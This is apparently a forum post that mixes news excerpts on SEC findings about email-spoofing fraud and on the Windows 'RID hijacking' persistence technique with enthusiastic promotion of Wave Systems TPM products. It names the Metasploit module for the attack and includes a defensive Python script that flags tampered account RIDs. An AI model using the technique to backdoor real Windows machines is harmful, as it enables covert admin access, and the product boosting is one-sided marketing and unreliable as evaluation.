On October 16, 2018, the SEC released an Investigative Report summarizing the SEC’s investigations into nine public companies that “were victims of cyber-related frauds” and “may have violated the federal securities laws by failing to have a sufficient system of internal accounting controls.”
In each instance, company personnel received spoofed or manipulated emails purportedly from company executives or vendors that duped the recipients into wiring money to accounts controlled by the attackers. The targeted employees included accounting personnel and executive-level employees. The financial losses were significant, with each company losing at least $1 million, and one company losing more than $45 million. In some cases, the spoofing schemes lasted months before detection, and some were uncovered only by third parties, not by the companies themselves.
Although the SEC declined to pursue enforcement actions against the companies based on the facts and circumstances of each case, it believed “these examples underscore the importance of devising and maintaining a system of internal accounting controls attuned to this kind of cyber-related fraud, as well as the critical role training plays in implementing controls that serve their purpose and protect assets in compliance with federal securities laws.”
The SEC reiterated its call that “public issuers subject to the requirements of Section 13(b)(2)(B) must calibrate their internal accounting controls to the current risk environment and assess and adjust policies and procedures accordingly.”
Recommendations on How to Guard Against Cyber Attacks
Based on the climate of cyber risk and the SEC’s view that compliance with federal securities laws mandates appropriate controls to address cyber threats, public companies would be advised to consider the following:
• Understand the risks posed by cyber-related frauds. In its February 2018 guidance and recent Investigative Report, the SEC emphasized that “cybersecurity presents ongoing risks and threats to our capital markets and to companies operating in all industries.”
• Consider cyber threats when implementing internal accounting controls. Given the importance of cybersecurity, the SEC has advised public companies that “cybersecurity risk management policies are key elements of enterprise-wide risk management, including as it relates to compliance with the federal securities laws.”
• Implement training and re-training protocols regarding cybersecurity risks. The SEC noted in the Investigative Report that the email scams were not sophisticated, and succeeded in part because company personnel disregarded indications that the spoofed emails lacked reliability and otherwise failed to follow company policies regarding payment authorization.
• Continue to re-assess the adequacy of existing policies and procedures. The SEC observed “the prevalence and continued expansion” of cybersecurity threats, and advised companies to continue to assess whether their internal accounting control systems were sufficient to “provide reasonable assurances in safeguarding their assets from these risks.”
The SEC has sent a clear signal that compliance with the federal securities laws will require public companies to identify and address cybersecurity risks. The SEC’s Investigative Report is just one reminder of the myriad ways in which public companies potentially are vulnerable to cyber threats. It will take diligent and thoughtful effort for public companies not only to meet these technological challenges but to do so in a way that satisfies their obligations under the federal securities laws and the SEC’s developing guidance in this area.
=================================================================
After reading Wave's whitepaper, Wave VSC 2.0, reading the article from JD Supra, and reading the PR from the 5 year master license agreement with the professional financial services company, one would think that CEOs and CISOs of public companies would opt for Wave VSC 2.0 over the other 2FAs to address their 2FA compliance needs. Sticking with the same old 2FA seems like a risky plan with so much at stake!
=================================================================
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/
Researcher finds simple way of backdooring Windows PCs and nobody notices for ten months
https://www.zdnet.com/article/researcher-finds-simple-way-of-backdooring-windows-pcs-and-nobody-notices-for-ten-months/
"RID Hijacking" technique lets hackers assign admin rights to guest and other low-level accounts.
A security researcher from Colombia has found a way of assigning admin rights and gaining boot persistence on Windows PCs that's simple to execute and hard to stop --all the features that hackers and malware authors are looking for from an exploitation technique.
What's more surprising is that the technique was first detailed way back in December 2017, but despite its numerous benefits and ease of exploitation, it has received neither media coverage nor been seen employed in malware campaigns.
Discovered by Sebastián Castro, a security researcher for CSL, the technique targets one of the parameters of Windows user accounts known as the Relative Identifier (RID).
The RID is a code added at the end of account security identifiers (SIDs) that describes that user's permissions group. There are several RIDs available, but the most common ones are 501 for the standard guest account, and 500 for admin accounts.
Castro, with help from CSL CEO Pedro García, discovered that by tinkering with registry keys that store information about each Windows account, he could modify the RID associated with a specific account and grant it a different RID, for another account group.
The technique does not allow a hacker to remotely infect a computer unless that computer has been foolishly left exposed on the Internet without a password.
But in cases where a hacker has a foothold on a system --via either malware or by brute-forcing an account with a weak password-- the hacker can give admin permissions to a compromised low-level account, and gain a permanent backdoor with full SYSTEM access on a Windows PC.
Since registry keys are also boot persistent, any modifications made to an account's RID remain permanent, or until fixed.
The attack is also very reliable, being tested and found to be working on Windows versions going from XP to 10 and from Server 2003 to Server 2016, although even older versions should be vulnerable, at least in theory.
"It is not so easy to detect when exploited, because this attack could be deployed by using OS resources without triggering any alert to the victim," Castro told ZDNet in an interview last week.
"On the other hand, I think it is easy to spot when doing forensics operations, but you need to know where to look.
"It is possible to find out if a computer has been a victim of RID hijacking by looking inside the [Windows] registry and checking for inconsistencies on the SAM [Security Account Manager]," Castro added.
A dead giveaway is if a guest account's SID ends with a "500" RID, a clear hint the guest account has admin rights and that someone has tampered with the registry keys.
The CSL researcher has created and released a module for the Metasploit Framework that automates the attack, for pen-testing purposes.
"We reached out to Microsoft as soon as the module was developed, but we did not receive any kind of response from them," Castro told us. "And no, it is not already patched."
It is unclear why Microsoft hasn't responded, but the researcher has been on a tour this summer, presenting his findings at various cyber-security conferences, such as Sec-T, RomHack, and DerbyCon. A video of his most recent presentation is embedded below.
"As far as I know, there was no internet documentation about this particular attack when I published the blog describing it," Castro told ZDNet. "Since this is a simple technique, I do not think that only my company and I knew about this."
But while some clever hacks like the one Castro has documented have been known to slip through and get no media coverage, they often don't go unnoticed by malware authors.
RID hijacking is simple, stealthy, and persistent --just what hackers like most about Windows flaws. But in this case, RID hijacking appears to have slipped by malware authors as well.
"I am not aware of any malware using this persistence technique," Castro told us. "I asked some malware analysts about it, but they told me they have not seen this implemented on malware."
==================================================================
Trivial Post-Intrusion Attack Exploits Windows RID
https://threatpost.com/trivial-post-intrusion-attack-exploits-windows-rid/138448/
Simple technique enables attackers to leverage Windows OS component to maintain stealth and persistence post system compromise.
A novel post-intrusion attack technique allows hackers to hijack a Windows system component called RID, allowing the adversaries to assign administrative privileges to “guest” and other low-level accounts.
The technique is simple and does not require a lot of sophistication, security researcher Sebastian Castro, who discovered the hack, told Threatpost. Microsoft was notified of the attack technique when it was discovered almost a year ago – and has yet to offer a fix, the researcher said.
“We have discovered and created a new post-exploitation technique called RID Hijacking,” Castro said in a recent blog post. “By using only OS resources, it is possible to hijack the RID of any existing account on the victim (even the 500 Administrator Built-in Account), and assign it to another user account.”
The attack starts in the Relative Identifier (RID), a component in Windows user accounts. RIDs are a label as part of Security Account Managers (SAMs), which describe a user’s varying permissions. SAMs typically have RID code at the end to define user permissions.
Two common RIDs in particular are the focus of the attack: the number 500 is commonly used at the end of SAMs for an Admin account, while 501 is used for a Guest Account.
The hijacking technique effectively manipulates the registry keys storing this information, and modifies the RID with accounts. So, the 501 labeling a guest account would be changed to 500, indicating permissions of an administrator.
“After compromising a machine, it is possible to automatize this attack remotely via PSExec, Remote Desktop, Powershell and also by using offensive tools like Metasploit,” Castro told Threatpost. “Since this is a persistence technique and not a privilege escalation vector, it is necessary to have elevated privileges already to deploy the attack.”
The Metasploit software to automatize the attack requires a meterpreter session against the victim – the module for this can be found at the latest official release of the MSF framework at post/windows/manage/rid_hijack, Castro said.
The attack was tested on Windows XP, Windows Server 2003, Windows 8.1 and Windows 10.
The attack does come with drawbacks – it cannot be done remotely (unless the computer is left unprotected on the internet). However, once a system has been exploited, it is difficult to detect.
“It is possible to find out if a computer has been victim of the RID Hijacking attack by looking inside the registry and checking for inconsistencies on the SAM,” he told us. “On the other hand, it is not so easy to detect right when exploited, because this attack could be deployed by using OS resources without triggering any alert on the victim.”
Castro said he reached out to Microsoft as soon as the module was developed in December 2017, but did not receive any kind of response from them.
Microsoft, for its part, told Threatpost that it is looking into the report.
“Microsoft has a strong commitment to security and a demonstrated track record of investigating and resolving reported vulnerabilities,” Jeff Jones, senior director at Microsoft, told Threatpost. “We’re looking into this report, and if we determine we need to take further action to help keep customers protected, we will.”
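Both articles above quote Castro's detection advice: RID hijacking leaves inconsistencies in the SAM, and the dead giveaway is a guest or other low-level account whose SID ends in the administrator RID 500. The script below is an added example, not code from either article, from CSL or from Wave; it turns that advice into a check that a defender can run over an account listing. The sample listing is constructed to resemble the `Name`/`SID` table that `wmic useraccount get Name,SID` prints, and the script assumes that listing reflects the RID values currently held in the SAM. It flags two conditions: an account carrying a well-known RID (500 or 501) under a name other than the built-in one, and two accounts sharing one RID.

```python
"""Audit a local Windows account listing for RID inconsistencies.

Added example (not from the articles or from CSL/Wave). The checks follow
the detection advice quoted above: a guest-style account whose SID ends in
the administrator RID 500, or two accounts sharing a RID, points at SAM
tampering and should be reviewed.
"""
import re
from collections import defaultdict

# Well-known RIDs of the built-in local accounts (documented by Microsoft).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest"}

# Local-domain SIDs have the form S-1-5-21-<a>-<b>-<c>-<RID>.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

# Constructed sample resembling `wmic useraccount get Name,SID` output.
# The Guest row has been given RID 500, the pattern the articles describe.
SAMPLE_LISTING = """Name           SID
Administrator  S-1-5-21-1111111111-2222222222-3333333333-500
Guest          S-1-5-21-1111111111-2222222222-3333333333-500
svc_backup     S-1-5-21-1111111111-2222222222-3333333333-1001
"""


def parse_rid(sid):
    """Return the RID (last sub-authority) of a local-domain SID, else None."""
    match = SID_RE.match(sid.strip())
    return int(match.group(1)) if match else None


def parse_listing(text):
    """Turn 'Name  SID' table lines into (name, sid) tuples, skipping the header."""
    records = []
    for line in text.splitlines():
        parts = line.strip().rsplit(None, 1)  # account names may contain spaces
        if len(parts) != 2 or not parts[1].startswith("S-1-"):
            continue  # header line or blank line
        records.append((parts[0], parts[1]))
    return records


def audit_accounts(records):
    """Return a list of human-readable findings; an empty list means no anomaly."""
    findings = []
    names_by_rid = defaultdict(list)
    for name, sid in records:
        rid = parse_rid(sid)
        if rid is None:
            findings.append(f"{name}: SID {sid} is not a local-domain SID")
            continue
        names_by_rid[rid].append(name)
        expected = WELL_KNOWN_RIDS.get(rid)
        if expected is not None and name != expected:
            findings.append(
                f"{name}: SID ends in well-known RID {rid} reserved for {expected}"
            )
    for rid, names in names_by_rid.items():
        if len(names) > 1:
            findings.append(f"RID {rid} shared by {', '.join(sorted(names))}")
    return findings


if __name__ == "__main__":
    for finding in audit_accounts(parse_listing(SAMPLE_LISTING)):
        print("FINDING:", finding)
```

A name mismatch on RID 500 or 501 is a lead, not proof: the built-in Administrator and Guest accounts can legitimately be renamed, so confirm any hit by comparing the live listing against a known-good baseline or by inspecting the SAM offline from a trusted boot. A shared RID, on the other hand, should never occur on a healthy system.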
==================================================================
This RID hijacking could be a potential problem for many companies as Microsoft has not offered a solution in almost a year. This persistent technique requires elevated privileges and they are needed to deploy the hijack. Wave VSC 2.0 could prevent the attacker from using a computer by not allowing the attacker to use a computer with these privileges. The attacker would have to have the computer (TPM) and the PIN number to deploy the attack and that is obviously much more difficult than a password or other 2FA product that has weaknesses.
https://www.wavesys.com/sales - The source for an excellent product like Wave VSC 2.0 to alleviate a potentially bad problem for companies that own Windows PCs.
https://www.wavesys.com/products/wave-virtual-smart-card
UK ISPs: Government Must Take Lead on Cybersecurity
https://www.infosecurity-magazine.com/news/uk-isps-government-take-lead-on/?utm_source=dlvr.it&utm_medium=twitter
The UK’s ISPs have called on the government to streamline the number of regulatory bodies dealing with cybersecurity, improve cybercrime reporting processes and set minimum standards for the industry.
The latest survey from the Internet Services Providers’ Association (ISPA) found that 88% suffer regular cyber-attacks: half of these on a daily basis.
However, they’re responding appropriately. Cybersecurity is a high or very high priority when it comes to day-to-day operations for 61% of ISPs, and an overwhelming 94% said they expect to increase investment in the area over the next three years.
Some 86% also plan on implementing the NCSC’s Active Cyber Defence strategy, which the GCHQ body claimed this week had driven some encouraging results over the past two years.
ISPs are very much on the front line when it comes to cyber-threats facing their customers, so it’s heartening that all respondents claimed the industry should play a proactive role in handling attacks, while 78% said they already offer cybersecurity services to their customers.
However, there appears to be a distinct lack of confidence in the government’s role, especially when it comes to the regulatory environment.
“Despite increased awareness about the importance of cybersecurity, government and law enforcement must turn their words into actions,” argued ISPA chair, Andrew Glover.
“In order to ensure the UK has an effective cybersecurity regime, the government should streamline the number of organizations involved in the cybersecurity landscape to minimize confusion. This needs to be underpinned by clear minimum standards on cybersecurity, set by government, and improved online cybercrime reporting processes.”
Some 40% of ISPs believe the response to cybercrime could be improved if there was better collaboration and coordination within the industry, although half currently don’t share their experiences with peers.
The industry also believes law enforcers need to get better at tackling online crime.
Nearly two-thirds (62%) of respondents said cybercrime handling would improve if police took a more coordinated approach, while 31% suggested that better cybercrime training was necessary. These were also the top two priorities reported in the 2016 survey, showing progress has not been made thus far.
It was revealed earlier this year that UK police spent £1.3m on cybersecurity training over the past three years.
==================================================================
An activated TPM should be a part of these minimum cybersecurity standards. What can activated TPMs do for organizations:
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
=================================================================
If Lord Renwick (worked for Wave) or someone like him could promote TPMs and Wave software capabilities, the UK government would be having more conversations with Wave Sales about Wave's products and the amazing things they do! Not having an activated TPM as part of minimum cybersecurity standards seems like a lack of intelligent thinking, IMO. 150+ companies backing the TPM standard, breaches and cyber attacks everywhere, and the TPM is still not being recommended as at least a minimum standard by governments?!!? It's better than the existing software security alone that leaves corporations and governments insecure!
=================================================================
https://www.wavesys.com/sales